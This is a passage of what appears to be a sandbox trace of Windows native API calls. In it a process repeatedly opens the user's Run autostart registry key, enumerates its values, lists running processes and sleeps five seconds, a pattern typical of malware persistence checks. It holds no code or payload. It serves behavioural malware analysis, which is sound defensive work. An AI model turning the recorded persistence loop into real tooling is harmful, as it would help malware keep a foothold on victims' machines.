KeyHandle=0xdea74*=0x274) returned 0x0 [0173.653] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.653] NtClose (Handle=0x274) returned 0x0 [0173.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.668] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.670] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.670] NtClose (Handle=0x274) returned 0x0 [0173.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.679] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.681] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.682] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.682] NtClose (Handle=0x274) returned 0x0 [0173.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.694] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.700] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.701] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.701] NtClose (Handle=0x274) returned 0x0 [0173.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.714] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.716] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.716] NtClose (Handle=0x274) returned 0x0 [0173.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.729] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.730] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.730] NtClose (Handle=0x274) returned 0x0 [0173.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.741] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.747] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.748] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.748] NtClose (Handle=0x274) returned 0x0 [0173.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.763] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.765] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.765] NtClose (Handle=0x274) returned 0x0 [0173.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.781] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.783] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.783] NtClose (Handle=0x274) returned 0x0 [0173.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.797] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.798] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.798] NtClose (Handle=0x274) returned 0x0 [0173.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.807] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.808] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.808] NtClose (Handle=0x274) returned 0x0 [0173.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.852] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.854] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.854] NtClose (Handle=0x274) returned 0x0 [0173.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.950] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.951] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.952] NtClose (Handle=0x274) returned 0x0 [0173.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.031] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.033] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.034] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.034] NtClose (Handle=0x274) returned 0x0 [0174.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.036] NtFreeVirtualMemory 